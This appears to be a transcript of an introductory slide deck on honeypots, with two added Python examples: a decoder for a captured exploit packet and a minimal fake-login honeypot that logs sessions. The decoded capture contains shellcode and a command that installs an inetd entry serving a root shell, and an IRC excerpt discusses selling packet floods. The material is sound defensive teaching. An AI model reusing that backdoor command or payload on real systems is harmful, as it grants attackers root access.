To Introduce You to Honeypots, What They
Transcript of To Introduce You to Honeypots, What They
-
8/14/2019 To Introduce You to Honeypots, What They
Honeypots
-
Purpose
To introduce you to honeypots, what they
are, how they work, their value.
-
Definition
Any security resource whose value lies in being probed, attacked, or compromised.
-
How honeypots work
Simple concept
A resource that expects no data, so any
traffic to or from it is most likely
unauthorized activity
-
Not limited to specific purpose
Honeypots do not solve one specific problem;
instead they are a tool that contributes to your
overall security architecture.
Their value, and the problems they help solve,
depend on how you build, deploy, and use them.
-
Types
Production (Law Enforcement)
Research (Counter-Intelligence)
Marty's idea
-
Value
What is the value of honeypots?
One of the greatest areas of confusion
concerning honeypot technologies.
-
Advantages
Based on how honeypots conceptually
work, they have several advantages.
Reduce False Positives and False Negatives
Data Value
Resources
Simplicity
-
Disadvantages
Based on the concept of honeypots, they
also have disadvantages:
Narrow Field of View
Fingerprinting
Risk
-
Production
Prevention
Detection
Response
-
Prevention
Keeping the burglar out of your house.
Honeypots, in general, are not effective prevention
mechanisms.
Deception, deterrence, and decoys are psychological
weapons. They do NOT work against automated
attacks:
worms
auto-rooters
mass-rooters
-
Detection
Detecting the burglar when he breaks in.
Honeypots excel at this capability, due to
their advantages.
-
Response
Honeypots can be used to help respond to
an incident.
Can easily be pulled offline (unlike production
systems).
Little to no data pollution.
-
Research Honeypots
Early Warning and Prediction
Discover new Tools and Tactics
Understand Motives, Behavior, and
Organization
Develop Analysis and Forensic Skills
-
Early Warning and Prediction
-
Tools
01/08-08:46:04.378306 10.10.10.1:3592 -> 10.10.10.2:6112
TCP TTL:48 TOS:0x0 ID:41388 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0xFEE2C115 Ack: 0x5F66192F Win: 0x3EBC TcpLen: 32
TCP Options (3) => NOP NOP TS: 463986683 4158792
30 30 30 30 30 30 30 32 30 34 31 30 33 65 30 30  0000000204103e00
30 31 20 20 34 20 00 00 00 31 30 00 80 1C 40 11  01  4 ...10...@.
80 1C 40 11 10 80 01 01 80 1C 40 11 80 1C 40 11  ..@.......@...@.
80 1C 40 11 80 1C 40 11 80 1C 40 11 80 1C 40 11  ..@...@...@...@.
D0 23 FF E0 E2 23 FF E4 E4 23 FF E8 C0 23 FF EC  .#...#...#...#..
82 10 20 0B 91 D0 20 08 2F 62 69 6E 2F 6B 73 68  .. ... ./bin/ksh
20 20 20 20 2D 63 20 20 65 63 68 6F 20 22 69 6E      -c  echo "in
67 72 65 73 6C 6F 63 6B 20 73 74 72 65 61 6D 20  greslock stream
74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 20  tcp nowait root
2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 22 3E 2F  /bin/sh sh -i">/
74 6D 70 2F 78 3B 2F 75 73 72 2F 73 62 69 6E 2F  tmp/x;/usr/sbin/
69 6E 65 74 64 20 2D 73 20 2F 74 6D 70 2F 78 3B  inetd -s /tmp/x;
73 6C 65 65 70 20 31 30 3B 2F 62 69 6E 2F 72 6D  sleep 10;/bin/rm
20 2D 66 20 2F 74 6D 70 2F 78 20 41 41 41 41 41   -f /tmp/x AAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
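The capture above is the kind of data a research honeypot yields: a single connection to 6112/tcp whose payload carries a SPARC no-op sled, shellcode, and a command that writes an inetd configuration serving a root shell on the "ingreslock" port, starts a second inetd from it, and deletes the file. The following Python script is an added example (not code from the original slides): it parses the Snort-style hex dump as printed, reassembles the payload bytes, pulls out the command string, and matches a few indicators against it. The indicator names and regular expressions are this example's own choices, not anything the slide defines.

```python
"""Decode the Snort-style hex dump shown on the slide and recover the
attacker's post-exploitation command.  Added example, not code from the
original slides; the indicator names and regexes are this example's own."""
import re
from typing import Dict, List, Tuple

# The capture as printed on the slide (only the rows reproduced there;
# the datagram itself was 1500 bytes, so this is a prefix).
SNORT_DUMP = """\
01/08-08:46:04.378306 10.10.10.1:3592 -> 10.10.10.2:6112
TCP TTL:48 TOS:0x0 ID:41388 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0xFEE2C115 Ack: 0x5F66192F Win: 0x3EBC TcpLen: 32
TCP Options (3) => NOP NOP TS: 463986683 4158792
30 30 30 30 30 30 30 32 30 34 31 30 33 65 30 30  0000000204103e00
30 31 20 20 34 20 00 00 00 31 30 00 80 1C 40 11  01  4 ...10...@.
80 1C 40 11 10 80 01 01 80 1C 40 11 80 1C 40 11  ..@.......@...@.
80 1C 40 11 80 1C 40 11 80 1C 40 11 80 1C 40 11  ..@...@...@...@.
D0 23 FF E0 E2 23 FF E4 E4 23 FF E8 C0 23 FF EC  .#...#...#...#..
82 10 20 0B 91 D0 20 08 2F 62 69 6E 2F 6B 73 68  .. ... ./bin/ksh
20 20 20 20 2D 63 20 20 65 63 68 6F 20 22 69 6E      -c  echo "in
67 72 65 73 6C 6F 63 6B 20 73 74 72 65 61 6D 20  greslock stream
74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 20  tcp nowait root
2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 22 3E 2F  /bin/sh sh -i">/
74 6D 70 2F 78 3B 2F 75 73 72 2F 73 62 69 6E 2F  tmp/x;/usr/sbin/
69 6E 65 74 64 20 2D 73 20 2F 74 6D 70 2F 78 3B  inetd -s /tmp/x;
73 6C 65 65 70 20 31 30 3B 2F 62 69 6E 2F 72 6D  sleep 10;/bin/rm
20 2D 66 20 2F 74 6D 70 2F 78 20 41 41 41 41 41   -f /tmp/x AAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
"""

# A dump row is up to 16 hex pairs, each followed by whitespace; the ASCII
# column that follows is never consumed because its characters are not
# separated by spaces.
HEX_ROW = re.compile(r"^\s*((?:[0-9A-Fa-f]{2}\s+){1,16})")
HEADER = re.compile(r"^(\S+)\s+(\S+):(\d+)\s+->\s+(\S+):(\d+)")


def parse_header(text: str) -> Tuple[str, str, int, str, int]:
    """Timestamp, source IP/port and destination IP/port from line one."""
    m = HEADER.match(text.splitlines()[0])
    if not m:
        raise ValueError("not a Snort packet header")
    return m.group(1), m.group(2), int(m.group(3)), m.group(4), int(m.group(5))


def parse_snort_hexdump(text: str) -> bytes:
    """Reassemble the payload from the hex columns; header lines (timestamp,
    TCP flags, options) do not start with hex pairs and are skipped."""
    payload = bytearray()
    for line in text.splitlines():
        m = HEX_ROW.match(line)
        if m:
            payload.extend(int(tok, 16) for tok in m.group(1).split())
    return bytes(payload)


INDICATORS: Dict[str, bytes] = {
    # 0x801c4011 is SPARC "bn,a", a no-op commonly repeated as a sled
    "sparc_nop_sled": rb"(?:\x80\x1c\x40\x11){4,}",
    # an inetd.conf entry that serves a root shell under a service name
    "root_shell_inetd_entry": rb"nowait\s+root\s+/bin/sh",
    # a second inetd started from an attacker-written configuration file
    "rogue_inetd": rb"/usr/sbin/inetd\s+-s\s+/tmp/\S+",
    # removal of that file afterwards
    "cleanup": rb"/bin/rm\s+-f\s+/tmp/\S+",
}


def find_indicators(payload: bytes) -> List[str]:
    return [name for name, pat in INDICATORS.items() if re.search(pat, payload)]


def printable_strings(payload: bytes, min_len: int = 4) -> List[str]:
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [s.decode("ascii") for s in re.findall(pattern, payload)]


def attacker_command(payload: bytes) -> str:
    """The longest printable run is the command handed to /bin/ksh; strip
    the trailing 'A' padding and collapse the spacing the exploit used to
    align the string inside its buffer."""
    longest = max(printable_strings(payload), key=len, default="")
    return " ".join(re.sub(r"A{8,}$", "", longest).split())


if __name__ == "__main__":
    ts, src, sport, dst, dport = parse_header(SNORT_DUMP)
    data = parse_snort_hexdump(SNORT_DUMP)
    print(f"{ts} {src}:{sport} -> {dst}:{dport}, {len(data)} payload bytes")
    print("indicators:", ", ".join(find_indicators(data)))
    print("command:", attacker_command(data))
```

Run it directly to print the decoded command and the indicators that fired. The row parser relies on the fixed Snort layout (16 hex pairs, then the ASCII column); feeding it dumps from other tools would need the pattern adjusted.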
-
Tactics
-
Motives and Behavior
J4ck: why don't you start charging for packet
attacks?
J4ck: "give me x amount and I'll take bla bla offline
for this amount of time"
J1LL: it was illegal last I checked.
J4ck: heh, then everything you do is illegal. Why not
make money off of it?
J4ck: I know plenty of people that'd pay exorbitant
amounts for packeting.
-
Level of Interaction
Level of Interaction determines amount of
functionality a honeypot provides.
The greater the interaction, the more you
can learn.
The greater the interaction, the more
complexity and risk.
-
Risk
Chance that an attacker can use your
honeypot to harm, attack, or infiltrate other
systems or organizations.
-
Low Interaction
Provide Emulated Services
No operating system for attacker to access.
Information is limited to transactional data and
the attacker's activity against the emulated
services.
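The "How honeypots work" slide and this one describe the same mechanism from two sides: the resource expects no traffic, so every session is an alert, and an emulated service captures what the attacker sends without ever handing over an operating system. The Python program below is an added example, not code from the slides or from any product named in this deck, of such a low-interaction service: a fake login prompt that refuses every attempt, records the dialogue as a JSON event, bounds how much it will read, and interprets nothing. The banner text, listening port and timeouts are assumptions.

```python
"""Minimal low-interaction honeypot: an emulated login service that records
everything a peer sends and never executes any of it.  Added example, not
code from the slides or from any product named on them; the banner text,
port and timeouts are assumptions."""
import io
import json
import socketserver
import sys
import time
from typing import BinaryIO, Callable, Dict, Tuple

BANNER = b"\r\nSunOS 5.8\r\n\r\nlogin: "   # assumed: pretends to be a Solaris telnet login
MAX_BYTES = 4096                         # keep at most this much input per session
IDLE_TIMEOUT = 30                        # seconds before a silent peer is dropped
LISTEN = ("0.0.0.0", 2323)               # assumed port; redirect 23/tcp here with a firewall rule


def handle_session(peer: str, rfile: BinaryIO, wfile: BinaryIO,
                   now: Callable[[], float] = time.time) -> Dict:
    """Drive one emulated login dialogue and return the event record.

    The honeypot serves no legitimate user, so the session itself is the
    alert.  Every login attempt is refused, and the peer's input is stored
    as data only, never interpreted, which is what keeps the risk low."""
    started = now()
    wfile.write(BANNER)
    wfile.flush()
    captured = bytearray()
    attempts = []
    expecting = "user"
    while len(captured) < MAX_BYTES:
        try:
            line = rfile.readline(MAX_BYTES - len(captured))   # bounded read
            if not line:
                break
            captured.extend(line)
            text = line.rstrip(b"\r\n").decode("latin-1")
            if expecting == "user":
                attempts.append({"user": text})
                wfile.write(b"Password: ")
                expecting = "password"
            else:
                attempts[-1]["password"] = text
                wfile.write(b"Login incorrect\r\nlogin: ")      # always refuse
                expecting = "user"
            wfile.flush()
        except OSError:                                        # timeout, reset, broken pipe
            break
    return {
        "event": "honeypot_session",
        "severity": "high",              # any contact is unauthorized by definition
        "peer": peer,
        "start": started,
        "duration": now() - started,
        "bytes": len(captured),
        "attempts": attempts,
        "raw": captured.decode("latin-1"),
    }


def replay(peer: str, data: bytes) -> Tuple[Dict, bytes]:
    """Run one session offline against captured input; returns the event
    record and the bytes the honeypot would have sent back."""
    out = io.BytesIO()
    record = handle_session(peer, io.BytesIO(data), out, now=lambda: 0.0)
    return record, out.getvalue()


class LoginHandler(socketserver.StreamRequestHandler):
    timeout = IDLE_TIMEOUT               # socketserver applies this to the request socket

    def handle(self) -> None:
        peer = "%s:%d" % self.client_address
        record = handle_session(peer, self.rfile, self.wfile)
        sys.stdout.write(json.dumps(record) + "\n")   # one JSON line per session
        sys.stdout.flush()


def serve(address=LISTEN) -> None:
    socketserver.ThreadingTCPServer.allow_reuse_address = True
    with socketserver.ThreadingTCPServer(address, LoginHandler) as srv:
        srv.serve_forever()


if __name__ == "__main__":
    serve()
```

Each session produces one JSON line on standard output, which is the whole of the data a low-interaction honeypot can offer: who connected, when, what they typed. Because the byte cap and idle timeout bound every session, and no input is ever passed to a shell or interpreter, the attacker gains nothing to pivot from, which is the trade the slide describes.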
-
High Interaction
Provide Actual Operating Systems
Learn extensive amounts of information.
Extensive risk.
-
Honeypots
BackOfficer Friendly
http://www.nfr.com/products/bof/
SPECTER http://www.specter.com
Honeyd http://www.citi.umich.edu/u/provos/honeyd/
ManTrap
http://www.recourse.com
Honeynets http://project.honeynet.org/papers/honeynet/
(Ordered from Low Interaction to High Interaction)
-
BackOfficer Friendly
-
Specter
-
Honeyd
create default
set default personality "FreeBSD 2.2.1-STABLE"
set default default action open
add default tcp port 80 "sh /usr/local/honeyd/scripts/web.sh"
add default tcp port 22 "sh /usr/local/honeyd/scripts/test.sh"
add default tcp port 113 reset
add default tcp port 1 reset
create windows
set windows personality "Windows NT 4.0 Server SP5-SP6"
-
ManTrap
-
Honeynets
-
Which is best?
None; they all have their advantages and disadvantages. It depends on what you are
attempting to achieve.
-
-
Legal Contact for
.mil / .gov
Department of Justice, Computer Crime and
Intellectual Property Section
General Number: (202) 514-1026
Specific Contact: Richard Salgado
Direct Telephone (202) 353-7848
E-Mail: [email protected]
-
Summary
Honeypots are a highly flexible security tool
that can be used in a variety of different
deployments.
-
Resources
Honeypots: Tracking Hackers
http://www.tracking-hackers.com